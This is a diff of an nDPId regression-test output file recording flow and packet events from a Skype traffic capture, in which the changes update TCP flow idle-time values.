-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431969658978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyihAAEAG3WDAqAEinTg0LMN0AbuAxvN6AAAAALAC\/\/9gYQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABAnpdAAEAGBHXAqAEinTc4qsN1AbtlArMMAAAAALAC\/\/+4FQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABACelAAEAGT0HAqAEinTeCjMN2AbvInJj+AAAAALAC\/\/8kpgAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1431969659109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659109,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIgG7w3aulZl7yJyY\/6ASOJBvwQAAAgQFrAQCCApOvfZ9PiLL2QEDAwk="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1431969659109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659109,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l91AAEAGwVjAqAEinTeCjMN2AbvInJj\/rpWZfIAQECzGaQAAAQEICj4izFtOvfZ9"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1431969659127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659127,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIgG7w3W+IGdaZQKzDaASOJBudwAAAgQFrAQCCApNea8RPiLL2QEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1431969659127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659127,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5BAAEAG44fAqAEinTc4qsN1AbtlArMNviBnW4AQECzFDgAAAQEICj4izGxNea8R"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1431969659189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659189,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7w3TcDZ\/TgMbze6ASOJA\/bQAAAgQFrAQCCApMZDEWPiLL2QEDAwk="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431969658978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyihAAEAG3WDAqAEinTg0LMN0AbuAxvN6AAAAALAC\/\/9gYQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABAnpdAAEAGBHXAqAEinTc4qsN1AbtlArMMAAAAALAC\/\/+4FQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABACelAAEAGT0HAqAEinTeCjMN2AbvInJj+AAAAALAC\/\/8kpgAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1431969659109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659109,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIgG7w3aulZl7yJyY\/6ASOJBvwQAAAgQFrAQCCApOvfZ9PiLL2QEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1431969659109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659109,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l91AAEAGwVjAqAEinTeCjMN2AbvInJj\/rpWZfIAQECzGaQAAAQEICj4izFtOvfZ9"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1431969659127,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659127,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIgG7w3W+IGdaZQKzDaASOJBudwAAAgQFrAQCCApNea8RPiLL2QEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1431969659127,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659127,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5BAAEAG44fAqAEinTc4qsN1AbtlArMNviBnW4AQECzFDgAAAQEICj4izGxNea8R"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1431969659189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659189,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7w3TcDZ\/TgMbze6ASOJA\/bQAAAgQFrAQCCApMZDEWPiLL2QEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3kJUAAEARCA3AqAEiQTffEjLdgQkAIzBxm84CB+tg2yEaM9\/bL8TBCQEYokW3ou6uIFeA"} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -261,10 +261,10 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BWcAAEAR4iHAqAEinTg0LTLdnEwAIdjym9YCeMy7FyJwEm6ud1zY3LUeAZMSqKDeqQ=="} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4bnAAAEARKjLAqAEiQTffETLdnFYAJDJym9gCRkbR2cp0xkwlV8oyn8X0NKXbrbkoGiloQw=="} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -310,8 +310,8 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/8JUAAEAR8n\/AqAEinTc4lzLdnFsAK42nm\/QCY347bApK+fSJyR3vpMK2pFmarm3qJcKY67tEOMSW2tE="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
